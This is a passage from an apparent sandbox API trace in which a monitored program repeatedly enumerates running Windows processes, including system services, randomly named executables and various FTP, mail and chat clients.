lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0183.528] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0183.529] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0183.531] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0183.532] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0183.534] CloseHandle (hObject=0x17ec) returned 1 [0183.534] Sleep (dwMilliseconds=0x64) [0183.570] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0183.630] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.632] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0183.634] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0183.635] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.644] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0183.647] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.648] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0183.650] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0183.651] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0183.653] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.654] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.656] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0183.657] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.659] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.660] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.662] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.663] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.665] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.666] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.674] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0183.718] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0183.720] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.721] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0183.723] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.724] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0183.726] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0183.727] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0183.729] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0183.754] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0183.758] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0183.759] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.761] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0183.762] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0183.764] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0183.765] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0183.767] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.769] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0183.770] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0183.772] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0183.773] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0183.775] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0183.825] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0183.827] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0183.829] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0183.830] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0183.832] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0183.833] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0183.835] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0183.836] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0183.838] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0183.840] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0183.841] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0183.842] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0183.844] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0183.846] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0183.847] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0183.849] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0183.850] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0183.852] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0183.855] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0183.857] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0183.859] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0183.931] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0183.944] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0183.947] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0183.949] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0183.951] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0183.953] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0183.955] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0183.956] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0183.958] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0183.961] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0183.963] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0183.965] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0183.967] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0183.969] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0183.973] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0183.975] Process32Next (in: hSnapshot=0x17ec, 